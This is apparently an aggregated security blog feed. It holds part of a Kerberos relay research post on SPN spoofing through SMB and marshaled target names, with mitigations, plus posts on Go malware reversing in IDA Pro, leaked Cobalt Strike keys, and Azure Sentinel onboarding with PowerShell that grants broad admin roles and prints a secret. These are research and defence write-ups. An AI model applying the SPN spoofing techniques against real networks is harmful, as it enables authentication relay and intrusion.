Whether the LDAP client enables integrity checking is based on the value of the LDAP_OPT_SIGN flag. As the connection only supports Negotiate authentication the client passes the ISC_REQ_NO_INTEGRITY flag if signing is disabled so that the server won't accidentally auto-detect the signing capability enabled for the Negotiate MIC and accidentally enable signing protection.

As part of recent changes to LDAP signing the client is forced to enable Integrity by the LdapClientIntegrity policy. This means that regardless of whether the LDAP server needs integrity protection it'll be enabled on the client which in turn will automatically enable it on the server. Changing the value of LDAP_OPT_SIGN in the client has no effect once this policy is enabled.

SMB

SMB is one of the most commonly exploited protocols for NTLM relay, as it's easy to convert access to a file into authentication. It would be convenient if it was also exploitable for Kerberos relay. While SMBv1 is deprecated and not even installed on newer installs of Windows, it's still worth looking at the implementation of v1 and v2 to determine if either are exploitable.

The client implementations of SMB 1 and 2 are in mrxsmb10.sys and mrxsmb20.sys respectively with some common code in mrxsmb.sys. Both protocols support specifying a name for the SPN which is related to DFS. The SPN name needs to be specified through the GUID_ECP_DOMAIN_SERVICE_NAME_CONTEXT ECP and is only enabled if the NETWORK_OPEN_ECP_OUT_FLAG_RET_MUTUAL_AUTH flag in the GUID_ECP_NETWORK_OPEN_CONTEXT ECP (set by MUP) is specified. This is related to UNC hardening which was added to protect things like group policies.

It's easy enough to trigger the conditions to set the NETWORK_OPEN_ECP_OUT_FLAG_RET_MUTUAL_AUTH flag. The default UNC hardening rules always add SYSVOL and NETLOGON UNC paths with a wildcard hostname. Therefore a request to \\evil.com\SYSVOL will cause the flag to be set and the SPN potentially overridable. The server should be a DFS server for this to work, however even with the flag set I've not found a way of setting an arbitrary SPN value remotely.

Even if you could spoof the SPN, the SMB clients always enable Integrity protection. Like LDAP, SMB will enable signing and encryption opportunistically if available from the client, unless UNC hardening measures are in place.

Marshaled Target Information SPN

While investigating the SMB implementation I noticed something interesting. The SMB clients use the function SecMakeSPNEx2 to build the SPN value from the service class and name. You might assume this would just return the SPN as-is, however that's not the case. Instead for the hostname of fileserver with the service class cifs you get back an SPN which looks like the following:

cifs/fileserver1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAfileserversBAAAA

Looking at the implementation of SecMakeSPNEx2 it makes a call to the API function CredMarshalTargetInfo. This API takes a list of target information in a CREDENTIAL_TARGET_INFORMATION structure and marshals it using a base64 string encoding. This marshaled string is then appended to the end of the real SPN.

The code is therefore just appending some additional target information to the end of the SPN, presumably so it's easier to pass around. My initial assumption would be this information is stripped off before passing to the SSPI APIs by the SMB client. However, passing this SPN value to InitializeSecurityContext as the target name succeeds and gets a Kerberos service ticket for cifs/fileserver. How does that work?

Inside the function SspiExProcessSecurityContext in lsasrv.dll, which is the main entrypoint of InitializeSecurityContext, there's a call to the CredUnmarshalTargetInfo API, which parses the marshaled target information. However SspiExProcessSecurityContext doesn't care about the unmarshalled results, instead it just gets the length of the marshaled data and removes that from the end of the target SPN string. Therefore before the Kerberos package gets the target name it has already been restored to the original SPN.

The encoded SPN shown earlier, minus the service class, is a valid DNS component name and therefore could be used as the hostname in a public or local DNS resolution request. This is interesting as this potentially gives a way of spoofing a hostname which is distinct from the real target service, but when processed by the SSPI API requests the spoofed service ticket. As in if you use the string fileserver1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAfileserversBAAAA as the DNS name, and if the client appends a service class to the name and passes it to SSPI it will get a service ticket for fileserver, however the DNS resolving can trivially return an unrelated IP address.

There are some big limitations to abusing this behavior. The marshaled target information must be valid, the last 6 characters is an encoded length of the entire marshaled buffer and the buffer is prefixed with a 28 byte header with a magic value of 0x91856535 in the first 4 bytes. If this length is invalid (e.g. larger than the buffer or not a multiple of 2) or the magic isn't present then the CredUnmarshalTargetInfo call fails and SspiExProcessSecurityContext leaves the SPN as is which will subsequently fail to query a Kerberos ticket for the SPN.

The easiest way that the name could be invalid is by it being converted to lowercase. DNS is case insensitive, however generally the servers are case preserving. Therefore you could lookup the case sensitive name and the DNS server would return that unmodified. However the HTTP clients tested all seem to lowercase the hostname before use, therefore by the time it's used to build an SPN it's now a different string. When unmarshalling 'a' and 'A' represent different binary values and so parsing of the marshaled information will fail.

Another issue is that the size limit of a single name in DNS is 63 characters. The minimum valid marshaled buffer is 44 characters long leaving only 19 characters for the SPN part. This is at least larger than the minimum NetBIOS name limit of 15 characters so as long as there's an SPN for that shorter name registered it should be sufficient. However if there's no short SPN name registered then it's going to be more difficult to exploit.

In theory you could specify the SPN using its FQDN. However it's hard to construct such a name. The length value must be at the end of the string and needs to be a valid marshaled value so you can't have any dots within its 6 characters. It's possible to have a TLD which is 6 characters or longer and as the embedded marshaled values are not escaped this can be used to construct a valid FQDN which would then resolve to another SPN target. For example:

fileserver1UWhRCAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAA.domain.oBAAAA

is a valid DNS name which would resolve to an SPN for fileserver. Except that oBAAAA is not a valid public TLD. Pulling the list of valid TLDs from ICANN's website and converting all values which are 6 characters or longer into the expected length value, the smallest length which is a multiple of 2 is from WEBCAM which results in a DNS name at least 264331 characters long, which is somewhat above the 255 character limit usually considered valid for a FQDN in DNS.

Therefore this would still be limited to more local attacks and only for limited sets of protocols. For example an authenticated user could register a DNS entry for the local domain using this value and trick an RPC client to connect to it using its undotted hostname. As long as the client doesn't modify the name other than putting the service class on it (or it gets automatically generated by the RPC runtime) then this spoofs the SPN for the request.

Microsoft's Response to the Research

I didn't initially start looking at Kerberos authentication relay, as mentioned I found it inadvertently when looking at IPsec and AuthIP which I subsequently reported to Microsoft. After doing more research into other network protocols I decided to use the AuthIP issue as a bellwether on Microsoft's views on whether relaying Kerberos authentication and spoofing SPNs would cross a security boundary.

As I mentioned earlier the AuthIP issue was classed as "vNext", which denotes it might be fixed in a future version of Windows, but not as a security update for any currently shipping version of Windows. This was because Microsoft determined it to be a Moderate severity issue (see this for the explanation of the severities). Only Important or above will be serviced.

It seems that the general rule is that any network protocol where the SPN can be spoofed to generate Kerberos authentication which can be relayed, is not sufficient to meet the severity level for a fix. However, any network facing service which can be used to induce authentication where the attacker does not have existing network authentication credentials is considered an Important severity spoofing issue and will be fixed. This is why PetitPotam was fixed as CVE-2021-36942, as it could be exploited from an unauthenticated user.

As my research focused entirely on the network protocols themselves and not the ways of inducing authentication, they will all be covered under the same Moderate severity. This means that if they were to be fixed at all, it'd be in unspecified future versions of Windows.

Available Mitigations

How can you defend yourself against authentication relay attacks presented in this blog post? While I think I've made the case that it's possible to relay Kerberos authentication, it's somewhat more limited in scope than NTLM relay. This means that disabling NTLM is still an invaluable option for mitigating authentication relay issues on a Windows enterprise network.

Also, except for disabling NTLM, all the mitigations for NTLM relay apply to Kerberos relay. Requiring signing or sealing on the protocol if possible is sufficient to prevent the majority of attack vectors, especially on important network services such as LDAP.

For TLS encapsulated protocols, channel binding prevents the authentication being relayed as I didn't find any way of spoofing the TLS certificate at the same time. If the network service supports EPA, such as HTTPS or LDAPS it should be enabled. Even if the protocol doesn't support EPA, enabling TLS protection if possible is still valuable. This not only provides more robust server authentication, which Kerberos mutual authentication doesn't really provide, it'll also hide Kerberos authentication tokens from sniffing or MitM attacks.

Some libraries, such as WinHTTP and .NET set the undocumented ISC_REQ_UNVERIFIED_TARGET_NAME request attribute when calling InitializeSecurityContext in certain circumstances. This affects the behavior of the server when querying for the SPN used during authentication. Some servers such as SMB and IIS with EPA can be configured to validate the SPN. If this request attribute flag is set then while the authentication will succeed when the server goes to check the SPN, it gets an empty string which will not match the server's expectations. If you're a developer you should use this flag if the SPN has been provided from an untrustworthy source, although this will only be beneficial if the server is checking the received SPN.

A common thread through the research is abusing local DNS resolution to spoof the SPN. Disabling LLMNR and MDNS should always be best practice, and this just highlights the dangers of leaving them enabled. While it might be possible to perform the same attacks through DNS spoofing attacks, these are likely to be much less reliable than local DNS spoofing attacks.

If Windows authentication isn't needed from a network client, it'd be wise to disable it if supported. For example, some HTTP user agents support disabling automatic Windows authentication entirely, while others such as Firefox don't enable it by default. Chromium also supports disabling the DNS lookup process for generating the SPN through group policy.

Finally, blocking untrusted devices on the network such as through 802.1X or requiring authenticated IPsec/IKEv2 for all network communications to high value services would go some way to limiting the impact of all authentication relay attacks. Although of course, an attacker could still compromise a trusted host and use that to mount the attack.

Conclusions

I hope that this blog post has demonstrated that Kerberos relay attacks are feasible and just disabling NTLM is not a sufficient mitigation strategy in an enterprise environment. While DNS is a common thread and is the root cause of the majority of these protocol issues, it's still possible to spoof SPNs using other protocols such as AuthIP and MSRPC without needing to play DNS tricks.

While I wrote my own tooling to perform the LLMNR attack there are various public tools which can mount an LLMNR and MDNS spoofing attack such as the venerable Python Responder. It shouldn't be hard to modify one of the tools to verify my findings.

I've also not investigated every possible network protocol which might perform Kerberos authentication. I've also not looked at non-Windows systems which might support Kerberos such as Linux and macOS. It's possible that in more heterogeneous networks the impact might be more pronounced as some of the security changes in Microsoft's Kerberos implementation might not be present.

If you're doing your own research into this area, you should look at how the SPN is specified by the protocol, but also how the implementation builds it. For example the HTTP Negotiate RFC states how to build the SPN for Kerberos, but then each implementation does it slightly differently and not to the RFC specification.

You should be especially wary of any protocol where an untrusted server can specify an arbitrary SPN. This is the case in AuthIP, MSRPC and DCOM. It's almost certain that when these protocols were originally designed many years ago, that no thought was given to the possible abuse of this design for relaying the Kerberos network authentication.

AlphaGolang | A Step-by-Step Go Malware Reversing Methodology for IDA Pro

21 October 2021 at 14:12

The increasing popularity of Go as a language for malware development is forcing more reverse engineers to come to terms with the perceived difficulties of analyzing these gargantuan binaries. The language offers great benefits for malware developers: portability of statically-linked dependencies, speed of simple concurrency, and ease of cross-compilation. On the other hand, for analysts, it’s meant learning the inadequacies of our tooling and contending with a foreign programming paradigm. While our tooling has generally improved, the perception that Go binaries are difficult to analyze remains. In an attempt to further dispel that myth, we’ve set out to share a series of scripts that simplify the task of analyzing Go binaries using IDA Pro with a friendly methodology. Our hope is that members of the community will feel inspired to share additional resources to bolster our collective analysis powers.

A Quick Intro to the Woes of Go Binary Analysis

Go binaries present multiple peculiarities that make our lives a little harder. The most obvious is their size. Due to the approach of statically-linking dependencies, the simplest Go binary is multiple megabytes in size and one with proper functionality can figure in the 15-20mb range. The binaries are then easily stripped of debug symbols and can be UPX packed to mask their size quite effectively. That bulky size entails a maze of standard code to confuse reverse engineers down long unproductive rabbit holes, steering them away from the sparse user-generated code that implements the actual functionality.

Hello World source code
Mach-o binary == 2.0mb
UPX compressed == 1.1mb

To make things worse, Go doesn’t null-terminate strings. The linker places strings in incremental order of length and functions load these strings with a reference to a fixed length. That’s a much safer implementation but it means that even a cursory glance at a Go binary means dealing with giant blobs of unrelated strings.

“Hello World!” string lost in a sea of unrelated strings.

Even the better disassemblers and decompilers tend to display these unparsed string blobs confusing their intended purpose.

Autoanalysis output

Manually fixed disassembly

That’s without getting into the complexities of recovering structures, accurately portraying function types, interfaces, and channels, or properly tracing argument references.

The issue of arguments should prove disturbing for our dynamic analyst friends who were hoping that a debugger would spare them the trouble of manual analysis. While a debugger certainly helps determine arguments at runtime, it’s important to understand how indirect that runtime is. Go is peculiar in allocating a runtime stack owned by the caller function that will in turn handle arguments and allow for multiple return values. For us it translates into a mess of runtime function prologues before any meaningful functionality. Good luck navigating that without symbols.

Improving the Go Reversing Experience

With all those inadvertent obstacles in mind, it’s perfectly understandable that reversers dreaded analyzing Go binaries. However, the situation has changed in the past few years and we should reassess our collective abhorrence of Go malware. Different disassemblers and decompilers have stepped up their Go support. BinaryNinja and Cerbero have improved their native support for Go and there are now standalone frameworks like GoRE that offer good functionality depending on the Go compiler version and can even help support other projects like radare2.

We’ll be focusing on IDA Pro. With the advent of version 7.6, IDA’s native support of Go binaries is drastically better and we’ll be building features on top of this. For folks stuck on v7.5 or lower, we’ll also provide some help by way of scripts but the full functionality of AlphaGolang is unlocked with 7.6 due to some missing APIs (specifically the ida_dirtree API for the new folder tree view). This isn’t the first time brave souls in the community have attempted to improve the Go reversing experience for IDA. However, those projects were largely monolithic labors of love by their original authors and given the fickle nature of IDA’s APIs, once those authors got busy, the scripts fell into disrepair. We hope to improve that as well.

AlphaGolang

With AlphaGolang, we wanted to tackle two disparate problems simultaneously– the brittleness of IDApython scripts for Go reversing and the need for clear steps to analyze these binaries.

We can’t expect everyone to be an expert in Go in order to understand their way around a binary. Less so to have to fix the tooling they’re attempting to rely on. While engineers might be tempted to address the former by elaborating a complex framework, we figured we’d swing in the opposite direction and break up the requisite functionality into smaller scripts. Those smaller digestible scripts allow us to part out a relatable methodology in steps so that analysts can pick and choose what they need as they advance in their reversing journey.

Additionally, we hope the simplicity of the project and a forthrightness about its current limitations will inspire others to contribute new steps, fixes, and additional functionality.

At this time, the first five steps are as follows–

Step 0: Identifying Go Binaries

Go Build ID Regex

By popular request, we are including a simple YARA rule to help identify Go binaries. This is a quick and scrappy solution that checks for PE, ELF, and Mach-O file headers along with a regex for a single Go Build ID string.

Step 1: Recreate pcln Table

Recreating the Go pcln table

Dealing with stripped Golang binaries is particularly awful. Reversers unfamiliar with Go are disheartened to see that despite having all of the original function names within the binary, their disassembler is unable to connect those symbols as labels for their functions. While that might seem like a grand coup for malware developers attempting to confuse and frustrate analysts, it isn’t more than a temporary inconvenience. Despite being stripped, we have enough information available to reconstruct the Go pcln table and provide the disassembler with the information it needs.

Two noteworthy points before continuing:

  • The pcln table is documented as early as Go v1.12 and has been modified as of v1.16.
  • IDA Pro v7.6+ handles Go binaries very well and is unlikely to need this step. This script will prove particularly valuable for folks using IDA v7.5 and under when dealing with stripped Go binaries.

Depending on the file’s endianness, the script will locate the pcln table’s magic header, walk the table converting the data to DWORDs (or QWORDs depending on the bitness), and create a new segment with the appropriate ‘.gopclntab’ header effectively undoing the stripping process.

Step 2: Discover Missing Functions and Restore Function Names

Function discovery and renaming

Immediately after recreating the pcln table (or in unfortunate cases where automatic disassembly fails), function names are not automatically assigned and many functions may have eluded discovery. We are going to fix both of these issues in one simple go.

We know that the pcln table is pointing us at every function in the binary, even if IDA hasn’t recognized them. This script will walk the pcln table, check the offsets therein for an existing function, and instruct IDA to define a function wherever one is missing. The resulting number of functions can be drastically greater even in cases where disassembly seems perfect.

Additionally, we’ll borrow Tim Strazzere’s magic from the original Golang Loader Assist in order to label all of our functions. We ported the plugin to Python 3, made it compatible with the new IDA APIs, and refactored it. The functionality is now part of two separate steps (2 and 4) and easier to maintain. In this step, Strazzere’s magic will help us associate all of our functions with their original names in an IDA friendly format.

Step 3: Surface User-Generated Functions

Automatically categorizing functions

Having recovered and labeled all of our functions, we are now faced with the daunting proposition of sifting through thousands of functions. Most of these functions are part of Go’s standard packages or perhaps functionality imported from GitHub repositories. To belabor a metaphor, we now have street signs but no map. How do we fix this?

IDA v7.5 introduced the concept of Folder Views, an easily missed Godsend for the anal-retentive reverser. This feature has to be explicitly turned on via a right-click on the desired subview –whether functions, structures, imports, etc. IDA v7.6 takes this a step further by introducing a thus-far undocumented API to interact with these folder views (A heartfelt thank you to Milan Bohacek for his help in effectively wielding this API). That should enable us to automate some extraordinary time-saving functionality.

While our malware may have 5,000 functions, the majority of those functions were not written by the malware developers, they’re publicly documented, and we need nothing more than a nominal overview to know what they do.

NOBELIUM GoldMax (a.k.a. SunShuttle)
94c58c7fb43153658eaa9409fc78d8741d3c388d3b8d4296361867fe45d5fa45

By being clever about categorizing function packages, we can actually whittle down to a fraction of the overall functions that merit analyst time. Functions will be categorized by their package prefixes and further grouped as ‘Standard Go Packages’, unlabeled (‘sub_’), uncategorized (no package prefix), and Github imports. What remains are the ‘main’ package and any custom packages added by the malware developers. For a notable example, the NOBELIUM GoldMax (a.k.a. SunShuttle) malware can be reduced from a hulking 4,771 functions to a mere 22. This is the simplest and perhaps the most valuable step towards our goal of understanding the malware’s functionality.

Step 4: Fix String References

Accurately recasting strings by reference

Finally, there’s the issue of strings in Go. Unlike all C-derivative languages, strings in Go are not null terminated. Neither are they grouped together based on their source or functionality. Rather, the linker places all of the strings in order of incremental length, with no obvious demarcation as to where one string ends and the next begins. This works because whenever a function references a string, it does so by loading the string address and a hardcoded length. While this is a safer paradigm for handling strings, it makes for an unpleasant reversing experience.

So how do we overcome this hurdle? Here’s where another piece of Strazzere’s Golang Loader Assist can help us. His original plugin would check functions for certain string loading patterns and use these as a guide to fix the string assignments. We have once again (partially) refactored this functionality, made it compatible with Python 3, and IDA’s new APIs. We have also improved some of the logic for the string blobs in place (either by suspicious length or because a reference points to the middle of a blob) and added some sanity checks.

While this step is already a marked improvement, we are seeing new string loading patterns introduced with Go v1.17 that need adding and there’s definitely room for improved refactoring. We hope some of you will feel inclined to contribute.

Where Do We Go From Here?

Let’s take a step back and look at where we are after all of these steps. We have an IDB with all functions discovered, labeled, and categorized, and hopefully all of their string references are correctly annotated. This is an ideal we could seldom dream of with malware of a comparable size written in C or C++ without extensive analysis time and prior expertise.

Now that we have a clear view of the user-generated functionality, what more can we do? How else can we improve our hunting and analysis efforts?

The following are a series of ideas we’d recommend implementing in further steps–

  • How about auto-generating YARA rules for user-generated functions and their referred strings?
  • Want a better understanding of arguments as they’re passed between functions? How about automagically setting breakpoints at the runtime stack prologues and annotating the arguments back to our IDB?
  • For reversers that follow the Kwiatkowski school of rewriting the code to understand the program’s functionality, how about selectively exporting the Hex-Rays pseudocode solely for the user-generated functions?
  • How about reconstructing interfaces and type structs from runtime objects?

Got more ideas? Want to help? Head to our SentinelLabs GitHub repo for all of the scripts and contribute your own shortcuts and superpowers for analyzing Go malware!

We’d like to thank the following for their direct and indirect contributions– 

  • Tim Strazzere for his original Golang Loader Assist script, which we refactored and made compatible with Python3 and the new IDA APIs. 
  • Milan Bohacek (Avast Software s.r.o.) for his invaluable help figuring out the idatree API.
  • Joakim Kennedy (Intezer)
  • Ivan Kwiatkowski (Kaspersky GReAT) for making his Go reversing course available.
  • Igor Kuznetsov (Kaspersky GReAT) for his help understanding newer pcln tab versions.

References

Guides and Documentation

Videos

Tools

Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1

21 October 2021 at 08:59

We found 6 private keys for rogue Cobalt Strike software, enabling C2 network traffic decryption.

The communication between a Cobalt Strike beacon (client) and a Cobalt Strike team server (C2) is encrypted with AES (even when it takes place over HTTPS). The AES key is generated by the beacon, and communicated to the C2 using an encrypted metadata blob (a cookie, by default).

RSA encryption is used to encrypt this metadata: the beacon has the public key of the C2, and the C2 has the private key.

Figure 1: C2 traffic

Public and private keys are stored in file .cobaltstrike.beacon_keys. These keys are generated when the Cobalt Strike team server software is used for the first time.

During our fingerprinting of Internet facing Cobalt Strike servers, we found public keys that are used by many different servers. This implies that they use the same private key, thus that their .cobaltstrike.beacon_keys file is shared.

One possible explanation we verified: are there cracked versions of Cobalt Strike, used by malicious actors, that include a .cobaltstrike.beacon_keys? This file is not part of a legitimate Cobalt Strike package, as it is generated at first time use.

Searching through VirusTotal, we found 10 cracked Cobalt Strike packages: ZIP files containing a file named .cobaltstrike.beacon_keys. Out of these 10 packages, we extracted 6 unique RSA key pairs.

2 of these pairs are prevalent on the Internet: 25% of the Cobalt Strike servers we fingerprinted (1500+) use one of these 2 key pairs.

This key information is now included in tool 1768.py, a tool developed by Didier Stevens to extract configurations of Cobalt Strike beacons.

Whenever a public key is extracted with known private key, the tool highlights this:

Figure 2: 1768.py extracting configuration from beacon

At minimum, this information is further confirmation that the sample came from a rogue Cobalt Strike server (and not a red team server).

Using option verbose, the private key is also displayed.

Figure 3: using option verbose to display the private key

This can then be used to decrypt the metadata, and the C2 traffic (more on this later).

Figure 4: decrypting metadata

In upcoming blog posts, we will show in detail how to use these private keys to decrypt metadata and decrypt C2 traffic.

About the authors
Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

Malicious campaign uses a barrage of commodity RATs to target Afghanistan and India

20 October 2021 at 12:55
Cisco Talos recently discovered a threat actor using political and government-themed malicious domains to target entities in India and Afghanistan.These attacks use dcRAT and QuasarRAT for Windows delivered via malicious documents exploiting CVE-2017-11882 — a memory corruption vulnerability in...

[[ This is only the beginning! Please visit the blog for the complete entry ]]

Beers with Talos, Ep. #110: The 10 most-exploited vulnerabilities this year (You won't believe No. 6!)

19 October 2021 at 20:13
Beers with Talos (BWT) Podcast episode No. 110 is now available. Download this episode and subscribe to Beers with Talos:Apple Podcasts Google PodcastsSpotify  StitcherIf iTunes and Google Play aren't your thing, click here. We mainly spend this episode doing some catching up...

[[ This is only the beginning! Please visit the blog for the complete entry ]]

Enterprise-scale seamless onboarding and deployment of Azure Sentinel using Lighthouse for multi-tenant environments

19 October 2021 at 17:27

NCC Group is offering a new fully Managed Detection and Response (MDR) service for our customers in Azure. This blog post gives a behind the scenes view of some of the automated processes involved in setting up new environments and managing custom analytics for each customer, including details about our scripting and automated build and release pipelines, which are deployed as infrastructure-as-code.

If you are:

  • a current or potential customer interested in how we manage our releases
  • just starting your journey into onboarding Sentinel for large multi-Tenant environments
  • are looking to enhance existing deployment mechanisms
  • are interested in a way to manage multi-Tenant deployments with varying set-up

…you have come to the right place!

Background

Sentinel is Microsoft’s new Security Information and Event Management solution hosted entirely on Azure.

NCC Group has been providing MDR services for a number of years using Splunk and we are now adding Sentinel to the list.

The benefit of Sentinel over the Splunk offering is that you will be able to leverage existing Azure licenses and all data will be collected and visibile in your own Azure tenants.

The only bits we keep on our side are the custom analytics and data enrichment functions we write for analysing the data.

What you might learn

The solution covered in this article provides a possible way to create an enterprise scale solution that, once implemented, gives the following benefits:

  • Management of a large numbers of tenants with differing configurations and analytics
  • Minimal manual steps for onboarding new tenants
  • Development and source control of new custom analytics
  • Management of multiple tenants within one Sentinel instance
  • Zero downtime / parallel deployments of new analytics
  • Custom web portal to manage onboarding, analytics creation, baselining, and configuration of each individual tenants’ connectors and enabled analytics

The main components

Azure Sentinel

Sentinel is Microsoft’s cloud native SIEM (Security Incident and Event Management) solution. It allows for gathering of a large number of log and event sources to be interrogated in real time, using in-built and custom KQL to automatically identify and respond to threats.

Lighthouse

Azure Lighthouse enables multi-tenant management with scalability, higher automation, and enhanced governance across resources.”

In essence, it allows a master tenant direct access to one or many sub or customer tenants without the need to switch directory or create custom solutions.

Lighthouse is used in this solution to connect to log analytics workspaces in additional tenants and view them within the same instance of Sentinel in our “master tenant”.

Log Analytics Workspaces

Analytics workspaces are where the data sources connected to Sentinel go into in this scenario. We will connect workspaces from multiple tenants via Lighthouse to allow for cross tenant analysis.

Azure DevOps (ADO)

Azure DevOps provides the core functionality for this solution used for both its CI/CD pipelines (Using YAML, not Classic for this) and inbuilt Git repos. The solutions provided will of course work if you decide to go for a different system.

App Service

To allow for easy management of configurations, onboarding and analytics development / baselining we hosted a small Web application written in Blazor, to avoid having to manually change JSON config files. The app also draws in MITRE and other additional data to enrich analytics.

Technologies breakdown:

In order for us to create and manage the required services we need to make use Infrastructure as Code (IaC), scripting, automated build and release pipelines as well as have a way to develop a management portal.

The technologies we ended up using for this were:

  • ARM Templates for general resource deployments and some of the connectors
  • PowerShell using Microsoft AZ / Sentinel and Roberto Rodriquez’s Azure-Sentinel2Go   
  • API calls for baselining and connectors not available through PowerShell modules
  • Blazor for configuration portal development
  • C# for API backend Azure function development
  • YAML Azure DevOps Pipelines

Phase 1: Tenant Onboarding

Let’s step through this diagram.

We are going to have a portal that allows us to configure a new client, go through an approval step to ensure configs are peer reviewed before going into production, by pushing the configuration into a new branch in source control, then trigger a Deployment pipeline.

The pipeline triggers 2 Tenant deployments.

Tenant A is our “Master tenant” that will hold the main Sentinel, all custom analytics, alerts, and playbooks and connect, using lighthouse, to all “Sub tenants” (Tenant B).

In the large organisations we would create a 1:1 mapping for each sub tenant by deploying additional workspaces that then point to the individual tenants. This has the benefit of keeping the analytics centralised, protecting intellectual property. You could, however, deploy them directly into the actual workspaces once Lighthouse is set up or have one workspace that queries all the others.

Tenant B and all other additional Tenants have their own instance of Sentinel with all required connectors enabled and need to have the lighthouse connection initiated from that side.

Pre-requisites:

To be able to deploy to either of the tenants we need Service connections for Azure DevOps to be in place.

“Sub tenant” deployment:

Some of the Sentinel Connectors need pretty extreme permissions to be enabled, for example to configure the Active Directory connector properly we need Global Administrator, Security Administrator roles as well as root scope Owner permissions on the tenant.  

In most cases, once the initial set up of the “sub tenant” is done there will rarely be a need to add additional connectors or deploy to that tenant, as all analytics are created on the “Master tenant”. I would strongly suggest either to disable or completely remove the Tenant B service connection after setup. If you are planning to regularly change connectors and are happy with the risk of leaving this service principal in place, then the steps will allow you to do this.

A sample script for setting this up the “Sub tenant” service Principal

$rgName = 'resourceGroupName' ## set the value of this to the resource group name containing the sentinel log analytics workspace
Connect-AzAccount
$cont = Get-AzContext
Connect-AzureAD -TenantId $cont.Tenant
 
$sp = New-AzADServicePrincipal -DisplayName ADOServicePrincipalName

Sleep 20
$assignment =  New-AzRoleAssignment -RoleDefinitionName Owner -Scope '/' -ServicePrincipalName $sp.ApplicationId -ErrorAction SilentlyContinue
New-AzRoleAssignment -RoleDefinitionName Owner -Scope "/subscriptions/$($cont.Subscription.Id)/resourceGroups/$($rgName)" -ServicePrincipalName $sp.ApplicationId
New-AzRoleAssignment -RoleDefinitionName Owner -Scope "/subscriptions/$($cont.Subscription.Id)" -ServicePrincipalName $sp.ApplicationId

$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($sp.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
$roles = Get-AzureADDirectoryRole | Where-Object {$_.displayName -in ("Global Administrator","Security Administrator")}
foreach($role in $roles)
{
Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.Id
}
$activeDirectorySettingsPermissions = (-not $assignment -eq $null)
$sp | select @{Name = 'Secret'; Expression = {$UnsecureSecret}},@{Name = 'tenant'; Expression = {$cont.Tenant}},@{Name = 'Active Directory Settings Permissions'; Expression = {$activeDirectorySettingsPermissions}},@{Name = 'sub'; Expression = {$cont.Subscription}}, applicationId, Id, DisplayName

This script will:

  1. create a new Service Principal,
  2. set the Global Administrator and Security Administrator roles for the principal,
  3. attempt to give root scope Owner permissions as well as subscription scope owner as a backup as this is the minimum required to connect Lighthouse if the root scope permissions are not set.

The end of the script prints out the details required to set this up as a Service connection in Azure DevOps . You could of course continue on to add the Service connection directly to Azure DevOps if the person running the script has access to both, but it was not feasible for my requirements.

For Tenant A we have 2 options.

Option 1: One Active Directory group to rule them all

This is something you might do if you are setting things up for your own multi-tenant environments. If you are have multiple environments to manage and different analysts’ access for each, I would strongly suggest using option 2.

Create an empty Azure Active Directory group either manually or using

(New-AzADGroup -DisplayName 'GroupName' -MailNickname 'none').Id
(Get-AzTenant).Id

You will need the ID of both the Group and the tenant in a second so don’t lose it just yet.

Once the group is created, set up a Service Connection to your Master tenant from Azure DevOps (just use the normal connection Wizard), then add the Service Principal to the newly created group as well as users you want to have access to the Sentinel (log analytics) workspaces.

To match the additional steps in Option 2, create a Variable group (either directly but masked or connected to a KeyVault depending on your preference) in Azure DevOps (Pipelines->Library->+Variable Group)

Make sure you restrict both Security and Pipeline permissions for the variable group to only be usable for the appropriate pipelines and users whenever creating variable groups.

Then Add:

AAdGroupID with your new Group ID

And

TenantID with the Tenant ID of the master tenant.

Then reference the Group at the top of your YAML pipeline within the Job section with

variables:
      - group: YourGroupName

Option 2: One group per “Sub tenant”

If you are managing customers, this is a much better way to handle things. You will be able to assign different users, to the groups to ensure only the correct people have access to the environments they are meant to have.

However, to be able to do this you need a Service Connection with some additional rights in your “Master Tenant”, so your pipelines can automatically create customer specific AD groups and add the Service principal to them.

Set up a Service Connection from Azure DevOps to your Master Tenant, then find the Service Principal and give it the following permissions

  • Azure Active Directory Graph
    • Directory.ReadWrite.All
  • Microsoft Graph
    • Directory.ReadWrite.All
    • PrivilegedAccess.ReadWrite.AzureADGroup

Then include the following script in your Pipeline to Create the group to be used for each customer and adding the service principal name to it.

param(
    [string]$AADgroupName,
    [string]$ADOServicePrincipalName
)
$group1 = Get-AzADGroup -DisplayName $AADgroupName -ErrorAction SilentlyContinue
if(-not $group1)
{
$guid1 = New-Guid
$group1 = New-AzADGroup -DisplayName $AADgroupName  -MailNickname $guid1 -Description $AADgroupName
$spID = (Get-AzADServicePrincipal -DisplayName $ADOServicePrincipalName).Id
Add-AzADGroupMember -MemberObjectId $spID -TargetGroupObjectId $group1.Id
}
$id = $group1.id
$tenant = (Get-AzTenant).Id
Write-Host "##vso[task.setvariable variable=AAdGroupId;isOutput=true]$($id)"
Write-Host "##vso[task.setvariable variable=TenantId;isOutput=true]$($tenant)" 

The Write-Hosts at the end of the script outputs the group and Tenant ID back to the pipeline to be used in setting up Lighthouse later.

With the boring bits out of the way, let’s get into the core of things.

Client configurations

First, we need to create configuration files to be able to manage the connectors and analytics that get deployed for each “Sub tenant”.

You can of course do this manually, but I opted to go for a slightly more user-friendly approach with the Blazor App.

The main bits we need, highlighted in yellow above are:

  • A name for the config
  • The Azure DevOps Service Connection name for the target Sub tenant,
  • Azure Region (if you are planning to deploy to multiple regions),
  • Target Resource Group and Target Workspace, this is either where the current Log Analytics of your target environment already exist or should be created.

Client config Schema:

    public class ClientConfig
    {
        public string ClientName { set; get; } = "";
        public string ServiceConnection { set; get; } = "";
        public List<Alert> SentinelAlerts { set; get; } = new List<Alert>();
        public List<Search> SavedSearches { set; get; } = new List<Search>();
        public string TargetWorkspaceName { set; get; } = "";
        public string TargetResourceGroup { set; get; } = "";
        public string Location { get; set; } = "UK South";
        public string connectors { get; set; } = "";
    }

Sample Config output:

{
    "ClientName": "TenantB",
    "ServiceConnection": "ServiceConnectionName",
    "SentinelAlerts": [
        {
